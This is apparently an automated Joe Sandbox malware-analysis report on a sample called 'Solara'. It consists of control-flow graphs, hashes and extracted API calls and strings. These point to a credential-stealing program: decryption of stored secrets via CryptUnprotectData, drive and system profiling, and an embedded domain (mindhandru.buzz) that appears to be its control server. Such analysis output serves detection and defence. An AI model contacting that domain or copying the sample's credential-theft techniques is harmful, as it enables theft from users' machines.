832->840 856 422eec 835->856 853 422c10-422c22 837->853 838->791 844 422769-422778 838->844 840->816 849 422780-42278c 844->849 858 42278e 849->858 850->850 855 422ab8-422ac0 850->855 853->853 857 422c24-422c2c 853->857 859 422ac2-422ac7 855->859 860 422ae1-422aed 855->860 868 422f07 856->868 861 422c51-422c5d 857->861 862 422c2e-422c35 857->862 858->791 863 422ad0-422adf 859->863 864 422b11-422b1c call 43fbe0 860->864 865 422aef-422af3 860->865 870 422c81-422ca1 GetLogicalDrives call 43fbe0 861->870 871 422c5f-422c63 861->871 869 422c40-422c4f 862->869 863->860 863->863 872 422b21-422b2d 864->872 866 422b00-422b0f 865->866 866->864 866->866 877 422f11 868->877 869->861 869->869 870->856 870->868 875 422cba 870->875 876 422ca8-422cb2 870->876 870->877 879 423040-42305a 870->879 880 422f17-422f31 870->880 873 422c70-422c7f 871->873 872->815 872->816 872->817 872->818 872->819 872->856 872->868 872->875 872->876 873->870 873->873 875->815 876->875 877->880 882 423060-42307e 879->882 881 422f40-422f5e 880->881 881->881 883 422f60-422fe8 881->883 882->882 884 423080-423108 882->884 885 422ff0-423013 883->885 886 423110-423133 884->886 885->885 887 423015-423038 call 4200b0 885->887 886->886 888 423135-423158 call 4200b0 886->888 887->879
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 9d7Z$MM$f1B$r$vG$w$
                                                                                                                                      • API String ID: 0-417836181
                                                                                                                                      • Opcode ID: e0f3ead7928615f00fd2daa7500f6dfcf1fead8ee24923595221dd3736eb1edb
                                                                                                                                      • Instruction ID: f02bfac084fd4d1da26890d48d3cfc9a5bf12ac57fd91786cfd4c6cc4497db09
                                                                                                                                      • Opcode Fuzzy Hash: e0f3ead7928615f00fd2daa7500f6dfcf1fead8ee24923595221dd3736eb1edb
                                                                                                                                      • Instruction Fuzzy Hash: 0A32DAB4608341DFD314CF69E88062BBBF1FF86354F44892DE5958B361E7B88945CB4A

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 893 422690-42269d 894 422843 893->894 895 422600-42260e 893->895 896 4226e1 893->896 897 422861-422873 893->897 898 4226a4-4226d8 893->898 899 4229a4 893->899 900 422a04-422a0a 893->900 901 422845-42284c 893->901 902 422a25-422a2b call 407fc0 893->902 903 422829-42283c 893->903 904 422a2e-422a3a 893->904 905 4226f0-422717 893->905 906 422810-422822 893->906 907 422a11-422a16 893->907 908 422855-42285f 893->908 909 422a3b-422a44 893->909 910 422a1d 893->910 894->901 895->903 911 422650-422682 895->911 912 422647 895->912 913 422615-422640 895->913 914 4227da-4227e6 895->914 915 4227ed-422805 895->915 916 422719-422726 896->916 938 422876-422880 897->938 898->896 929 4229e5-4229fe call 407fb0 899->929 917 4229e0 900->917 918 422a0c-422a0f 900->918 901->908 902->904 903->894 903->897 903->899 903->900 903->901 903->902 903->904 903->907 903->908 903->909 903->910 923 422b34-422b3b 903->923 905->916 906->894 906->897 906->899 906->900 906->901 906->902 906->903 906->904 906->907 906->908 906->909 906->910 906->923 907->902 907->904 907->909 907->910 919 422cc0 907->919 920 422de0-422e8f 907->920 921 422cc6-422d74 907->921 922 422b44-422b4d 907->922 907->923 908->938 925 422a46-422a4b 909->925 926 422a4d 909->926 910->902 911->894 911->895 911->896 911->897 911->898 911->899 911->900 911->901 911->902 911->903 911->904 911->905 911->906 911->907 911->908 911->909 911->910 912->911 913->911 913->912 914->903 914->911 914->912 914->915 915->894 915->897 915->899 915->900 915->901 915->902 915->903 915->904 915->906 915->907 915->908 915->909 915->910 915->923 933 422730-422759 916->933 917->929 918->929 919->921 927 422e90-422ec6 920->927 936 422d80-422db6 921->936 930 422b56 922->930 931 422b4f-422b54 922->931 923->922 932 422a54-422a8b call 407fb0 925->932 926->932 927->927 939 422ec8-422ee4 call 420500 927->939 929->900 942 422b5d-422c01 call 407fb0 930->942 931->942 955 422a90-422ab6 932->955 933->933 943 42275b-422763 933->943 936->936 945 422db8-422dd4 call 420500 936->945 961 422eec 939->961 958 422c10-422c22 942->958 943->895 949 422769-422778 943->949 945->920 954 422780-42278c 949->954 963 42278e 954->963 955->955 960 422ab8-422ac0 955->960 958->958 962 422c24-422c2c 958->962 964 422ac2-422ac7 960->964 965 422ae1-422aed 960->965 973 422f07 961->973 966 422c51-422c5d 962->966 967 422c2e-422c35 962->967 963->895 968 422ad0-422adf 964->968 969 422b11-422b1c call 43fbe0 965->969 970 422aef-422af3 965->970 975 422c81-422ca1 GetLogicalDrives call 43fbe0 966->975 976 422c5f-422c63 966->976 974 422c40-422c4f 967->974 968->965 968->968 977 422b21-422b2d 969->977 971 422b00-422b0f 970->971 971->969 971->971 982 422f11 973->982 974->966 974->974 975->961 975->973 980 422cba 975->980 981 422ca8-422cb2 975->981 975->982 984 423040-42305a 975->984 985 422f17-422f31 975->985 978 422c70-422c7f 976->978 977->919 977->920 977->921 977->922 977->923 977->961 977->973 977->980 977->981 978->975 978->978 980->919 981->980 982->985 987 423060-42307e 984->987 986 422f40-422f5e 985->986 986->986 988 422f60-422fe8 986->988 987->987 989 423080-423108 987->989 990 422ff0-423013 988->990 991 423110-423133 989->991 990->990 992 423015-423038 call 4200b0 990->992 991->991 993 423135-423158 call 4200b0 991->993 992->984
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 9d7Z$MM$f1B$r$vG$w$
                                                                                                                                      • API String ID: 0-417836181
                                                                                                                                      • Opcode ID: a356f08b245a4e0d60eb824b0293e7b9b4abc442f43027a82ddacfbc0e60a43c
                                                                                                                                      • Instruction ID: 874ecf0cf16bc9fec07055dbc218189d02f62e0efd4d4b867cf34bc4bc150c7c
                                                                                                                                      • Opcode Fuzzy Hash: a356f08b245a4e0d60eb824b0293e7b9b4abc442f43027a82ddacfbc0e60a43c
                                                                                                                                      • Instruction Fuzzy Hash: 2232DAB4608341DFD314CF69E88062BBBF1FF86354F44892DE5958B361E7B88945CB4A

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1127 422890-4228de 1128 4228e0-42290a 1127->1128 1128->1128 1129 42290c-422955 1128->1129 1131 422960-422991 1129->1131 1131->1131 1132 422993-42299d 1131->1132 1133 422cc0 1132->1133 1134 422a11-422a16 1132->1134 1135 4229a4 1132->1135 1136 422a04-422a0a 1132->1136 1137 422b44-422b4d 1132->1137 1138 422b34-422b3b 1132->1138 1139 422a25-422a2b call 407fc0 1132->1139 1140 422a3b-422a44 1132->1140 1141 422a2e-422a3a 1132->1141 1142 4229ae-4229b4 1132->1142 1143 422a1d 1132->1143 1154 422cc6-422d74 1133->1154 1134->1133 1134->1137 1134->1138 1134->1139 1134->1140 1134->1141 1134->1143 1153 422de0-422e8f 1134->1153 1134->1154 1157 4229e5-4229fe call 407fb0 1135->1157 1151 4229e0 1136->1151 1152 422a0c-422a0f 1136->1152 1149 422b56 1137->1149 1150 422b4f-422b54 1137->1150 1138->1137 1139->1141 1147 422a46-422a4b 1140->1147 1148 422a4d 1140->1148 1145 4229b6-4229bb 1142->1145 1146 4229bd 1142->1146 1143->1139 1156 4229c0-4229d7 call 407fb0 1145->1156 1146->1156 1159 422a54-422a8b call 407fb0 1147->1159 1148->1159 1158 422b5d-422c01 call 407fb0 1149->1158 1150->1158 1151->1157 1152->1157 1155 422e90-422ec6 1153->1155 1161 422d80-422db6 1154->1161 1155->1155 1162 422ec8-422ee4 call 420500 1155->1162 1156->1136 1157->1136 1176 422c10-422c22 1158->1176 1175 422a90-422ab6 1159->1175 1161->1161 1167 422db8-422dd4 call 420500 1161->1167 1182 422eec 1162->1182 1167->1153 1175->1175 1181 422ab8-422ac0 1175->1181 1176->1176 1180 422c24-422c2c 1176->1180 1185 422c51-422c5d 1180->1185 1186 422c2e-422c35 1180->1186 1183 422ac2-422ac7 1181->1183 1184 422ae1-422aed 1181->1184 1197 422f07 1182->1197 1190 422ad0-422adf 1183->1190 1191 422b11-422b1c call 43fbe0 1184->1191 1192 422aef-422af3 1184->1192 1188 422c81-422ca1 GetLogicalDrives call 43fbe0 1185->1188 1189 422c5f-422c63 1185->1189 1187 422c40-422c4f 1186->1187 1187->1185 1187->1187 1188->1182 1188->1197 1200 422cba 1188->1200 1201 422ca8-422cb2 1188->1201 1202 423040-42305a 1188->1202 1203 422f11 1188->1203 1204 422f17-422f31 1188->1204 1194 422c70-422c7f 1189->1194 1190->1184 1190->1190 1198 422b21-422b2d 1191->1198 1193 422b00-422b0f 1192->1193 1193->1191 1193->1193 1194->1188 1194->1194 1197->1203 1198->1133 1198->1137 1198->1138 1198->1153 1198->1154 1198->1182 1198->1197 1198->1200 1198->1201 1200->1133 1201->1200 1206 423060-42307e 1202->1206 1203->1204 1205 422f40-422f5e 1204->1205 1205->1205 1208 422f60-422fe8 1205->1208 1206->1206 1207 423080-423108 1206->1207 1210 423110-423133 1207->1210 1209 422ff0-423013 1208->1209 1209->1209 1211 423015-423038 call 4200b0 1209->1211 1210->1210 1212 423135-423158 call 4200b0 1210->1212 1211->1202
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 9d7Z$MM$f1B$r$vG$w
                                                                                                                                      • API String ID: 0-1428939846
                                                                                                                                      • Opcode ID: ebaafa67e2b7d24f875927a48ee9d9e18f936db6a40c6ccbafff29d81803c232
                                                                                                                                      • Instruction ID: 5c24b37c19bf42bc8c8b2e5ca3c42dda614ed11c02ef5961d825b370d9a7daee
                                                                                                                                      • Opcode Fuzzy Hash: ebaafa67e2b7d24f875927a48ee9d9e18f936db6a40c6ccbafff29d81803c232
                                                                                                                                      • Instruction Fuzzy Hash: DD22B9B02083419FD320DF65E98166BBBE0EF86354F44892DE5D48B361E7B88945CB9B

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1223 408630-408641 call 43c3e0 1226 408941-408943 ExitProcess 1223->1226 1227 408647-40864e call 435850 1223->1227 1230 408654-40867a GetCurrentProcessId GetCurrentThreadId 1227->1230 1231 40892a-408931 1227->1231 1232 408680-4087c9 SHGetSpecialFolderPathW 1230->1232 1233 40867c-40867e 1230->1233 1234 408933-408939 call 407fc0 1231->1234 1235 40893c call 43cab0 1231->1235 1236 4087d0-408829 1232->1236 1233->1232 1234->1235 1235->1226 1236->1236 1239 40882b-408857 call 43afc0 1236->1239 1243 408860-40887c 1239->1243 1244 408896-4088af GetForegroundWindow 1243->1244 1245 40887e-408894 1243->1245 1246 4088e0-40891e call 409ae0 1244->1246 1247 4088b1-4088de 1244->1247 1245->1243 1246->1231 1250 408920 call 40c630 1246->1250 1247->1246 1252 408925 call 40b410 1250->1252 1252->1231
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00408654
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040865E
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087A7
                                                                                                                                      • GetForegroundWindow.USER32 ref: 004088A7
                                                                                                                                      • ExitProcess.KERNEL32 ref: 00408943
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4063528623-0
                                                                                                                                      • Opcode ID: 473dc5eba0dd76e72c93d8d708d7519de016e42aad3efdb1987b46f439088475
                                                                                                                                      • Instruction ID: 6525e1a361aa5be5b63b20d39ed021e68fd451da80fce72add592220a675769f
                                                                                                                                      • Opcode Fuzzy Hash: 473dc5eba0dd76e72c93d8d708d7519de016e42aad3efdb1987b46f439088475
                                                                                                                                      • Instruction Fuzzy Hash: EE81F873E043104FD308DF69CD9635BBAD6ABC8314F0A853EA889EB395DA789C058785

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1254 42b73e-42b752 1255 42b760-42b784 1254->1255 1255->1255 1256 42b786-42b78b 1255->1256 1257 42b7ad 1256->1257 1258 42b78d-42b791 1256->1258 1260 42b7b0-42bc4f 1257->1260 1259 42b7a0-42b7a9 1258->1259 1259->1259 1261 42b7ab 1259->1261 1263 42bc50-42bc72 1260->1263 1261->1260 1263->1263 1264 42bc74-42bc79 1263->1264 1265 42bc8b-42bc97 1264->1265 1266 42bc7b-42bc7f 1264->1266 1268 42bcb1-42bcd5 call 43e5d0 1265->1268 1269 42bc99-42bc9b 1265->1269 1267 42bc80-42bc89 1266->1267 1267->1265 1267->1267 1272 42bcda-42bcff GetPhysicallyInstalledSystemMemory 1268->1272 1271 42bca0-42bcad 1269->1271 1271->1271 1273 42bcaf 1271->1273 1274 42bd00-42bd44 1272->1274 1273->1268 1274->1274 1275 42bd46-42bd7f call 41cbb0 1274->1275 1278 42bd80-42bda6 1275->1278 1278->1278 1279 42bda8-42bdb5 1278->1279 1280 42bdb7-42bdbb 1279->1280 1281 42bdcd 1279->1281 1282 42bdc0-42bdc9 1280->1282 1283 42bdd0-42bdd8 1281->1283 1282->1282 1284 42bdcb 1282->1284 1285 42bdda-42bddb 1283->1285 1286 42bdeb-42bdf6 1283->1286 1284->1283 1289 42bde0-42bde9 1285->1289 1287 42be0b-42be4f 1286->1287 1288 42bdf8-42bdf9 1286->1288 1291 42be50-42be73 1287->1291 1290 42be00-42be09 1288->1290 1289->1286 1289->1289 1290->1287 1290->1290 1291->1291 1292 42be75-42be7a 1291->1292 1293 42be8b-42be93 1292->1293 1294 42be7c-42be7f 1292->1294 1296 42be95-42be96 1293->1296 1297 42beab-42bf23 1293->1297 1295 42be80-42be89 1294->1295 1295->1293 1295->1295 1298 42bea0-42bea9 1296->1298 1298->1297 1298->1298
                                                                                                                                      APIs
                                                                                                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042BCDE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                      • String ID: _U@J$8H6
                                                                                                                                      • API String ID: 3960555810-3309195718
                                                                                                                                      • Opcode ID: d116dd34ba4b7b6082cfa2485e4bc4b491549f7a2623d35363395a42d08043da
                                                                                                                                      • Instruction ID: 7eb90d1e7d28f1720e499a6d4f26b70ee92698bee75e8bd62529a967669021a3
                                                                                                                                      • Opcode Fuzzy Hash: d116dd34ba4b7b6082cfa2485e4bc4b491549f7a2623d35363395a42d08043da
                                                                                                                                      • Instruction Fuzzy Hash: C6A107746087918FD7168F2A94A07A2FFE1FF57300F58859EC0D69B382D7399806CB94

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1315 433c95-433d76 call 413ea0 GetSystemMetrics * 2 1323 433d7d-433e0e 1315->1323
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                                      • Opcode ID: 5b138f3c73ff90597aa7e8f7983edb83adfa2996abfa6d9953d0ed04b013121f
                                                                                                                                      • Instruction ID: 46baf844f44c9587460089a2cd138698c7ae207c05784dd08c5e7d25f3a185f8
                                                                                                                                      • Opcode Fuzzy Hash: 5b138f3c73ff90597aa7e8f7983edb83adfa2996abfa6d9953d0ed04b013121f
                                                                                                                                      • Instruction Fuzzy Hash: F85170B4E142088FCB40EFACD98569DBBF0BF89310F11852AE898E7350D774A944CF96
                                                                                                                                      APIs
                                                                                                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042BCDE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                      • String ID: _U@J
                                                                                                                                      • API String ID: 3960555810-3190672184
                                                                                                                                      • Opcode ID: a7f3abed17770290e34537f897a06afe60773b6d18d08cbc49c9e7ad0ab46a59
                                                                                                                                      • Instruction ID: 375e62ff3cd78a82eb4d5a8f93c1888d0a50be805c2ffa9150745ac71612cf8e
                                                                                                                                      • Opcode Fuzzy Hash: a7f3abed17770290e34537f897a06afe60773b6d18d08cbc49c9e7ad0ab46a59
                                                                                                                                      • Instruction Fuzzy Hash: 4F91E6746046928FD7168F2AD4A07A2FFE1FF57300F5885AEC0D69B342D7399406CB95
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Uninitialize
                                                                                                                                      • String ID: mindhandru.buzz
                                                                                                                                      • API String ID: 3861434553-2028435908
                                                                                                                                      • Opcode ID: a06c64816ffa0abca3226635415fb9a87a8729313f9a0b1e84a2812cf47a6f15
                                                                                                                                      • Instruction ID: 2f92936bbb488e7b822a4d9273b10aee0c6d8f036f250852411a649b1799ffee
                                                                                                                                      • Opcode Fuzzy Hash: a06c64816ffa0abca3226635415fb9a87a8729313f9a0b1e84a2812cf47a6f15
                                                                                                                                      • Instruction Fuzzy Hash: BE919DB01483C18FD375CF2984A07EBBFE0AF92304F184A6ED4D96B292D7794906CB56
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #q&s$tu
                                                                                                                                      • API String ID: 0-3224641712
                                                                                                                                      • Opcode ID: 777373340bc9b5572676835d25b8097b9b4ce95a72d48dab21227df4fc556d68
                                                                                                                                      • Instruction ID: e75f51cf3935187afa8d3ce64b0d5e35a97229fd47c589a0317f7c473ab1b59d
                                                                                                                                      • Opcode Fuzzy Hash: 777373340bc9b5572676835d25b8097b9b4ce95a72d48dab21227df4fc556d68
                                                                                                                                      • Instruction Fuzzy Hash: 2E416976759384ABC3209F359C8132BBBE29BD6210F28A57EE4C4C7755D638C806CB05
                                                                                                                                      APIs
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004151AC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 834300711-0
                                                                                                                                      • Opcode ID: a37b01be9a152c12e9a8c9adf2c56d465192ded63a5b577bf92878c8eb15c498
                                                                                                                                      • Instruction ID: e8206d7e07a9348ce572cc2843209c2b0964a09594d7179009ac082ddb3e2830
                                                                                                                                      • Opcode Fuzzy Hash: a37b01be9a152c12e9a8c9adf2c56d465192ded63a5b577bf92878c8eb15c498
                                                                                                                                      • Instruction Fuzzy Hash: 9181CF759087419FC720CF28C4906EBB7E1EFCA314F44895EE49987292D738D985CB46
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(0043FBBA,005C003F,00000018,?,?,00000018,?,?,?), ref: 0043CB6E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: D]+\
                                                                                                                                      • API String ID: 0-1174097187
                                                                                                                                      • Opcode ID: f3add65c8c66c1264d36a7cedc1dc6a2a35e4876c016a884e0f2d047e04cdaf3
                                                                                                                                      • Instruction ID: 57aa72638c98ce2d8f959c8624c19577f898566f2cc3933257cded3dbd705927
                                                                                                                                      • Opcode Fuzzy Hash: f3add65c8c66c1264d36a7cedc1dc6a2a35e4876c016a884e0f2d047e04cdaf3
                                                                                                                                      • Instruction Fuzzy Hash: 80512D36B405554BDB15CB68DC925BF77E2EB89314F2D122DD892A7384D7389C028798
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                                                      • Opcode ID: 4058944072796ca71fbba865c7ac76e2a44e31e05df5f8c08e7e75fcda71549d
                                                                                                                                      • Instruction ID: 55a2e18f1c91ed2eb06740b9858f601295e9f11996a9e115cc2611de2f289390
                                                                                                                                      • Opcode Fuzzy Hash: 4058944072796ca71fbba865c7ac76e2a44e31e05df5f8c08e7e75fcda71549d
                                                                                                                                      • Instruction Fuzzy Hash: 2B21EF710083059BD710DF19D88266BBBF5FF9A314F10A92DE695873D1E3359808CB9A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 5458d8ce92b2d52b8b7babda298c5289894db38333b79e8189c91a4c9e8321e5
                                                                                                                                      • Instruction ID: b65b817c1c12ae57a8d770312d292270b958f22a563743e40d845ef67ec1a9be
                                                                                                                                      • Opcode Fuzzy Hash: 5458d8ce92b2d52b8b7babda298c5289894db38333b79e8189c91a4c9e8321e5
                                                                                                                                      • Instruction Fuzzy Hash: 68C18E71B087604BDB14CF24984167BB7A2EFD5304F9A853EE9859B341E338ED06D39A

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1299 42c344-42c34b 1300 42c35b-42c39f FreeLibrary call 43e5d0 1299->1300 1301 42c34d-42c34f 1299->1301 1307 42c3a0-42c420 1300->1307 1302 42c350-42c359 1301->1302 1302->1300 1302->1302 1307->1307 1308 42c426-42c42b 1307->1308 1309 42c44d-42c450 1308->1309 1310 42c42d-42c433 1308->1310 1312 42c452-42c48c GetComputerNameExA 1309->1312 1311 42c440-42c449 1310->1311 1311->1311 1313 42c44b 1311->1313 1314 42c491 1312->1314 1313->1312 1314->1314
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0042C365
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042C467
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerFreeLibraryName
                                                                                                                                      • String ID: 67"9
                                                                                                                                      • API String ID: 2904949787-764888412
                                                                                                                                      • Opcode ID: 6273d680a983f7395ed7dcddbded441ac5c7d0d1942819fd894000ea8b664065
                                                                                                                                      • Instruction ID: dc2dc78447f9c8bb9b0e97c67a5edb44f5c1064523ecf9d5839ca8313f422e74
                                                                                                                                      • Opcode Fuzzy Hash: 6273d680a983f7395ed7dcddbded441ac5c7d0d1942819fd894000ea8b664065
                                                                                                                                      • Instruction Fuzzy Hash: E73128356056418FE7298F39D8907667BE3AF9B304F2C85ADD4D68B796CA399802CB40

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
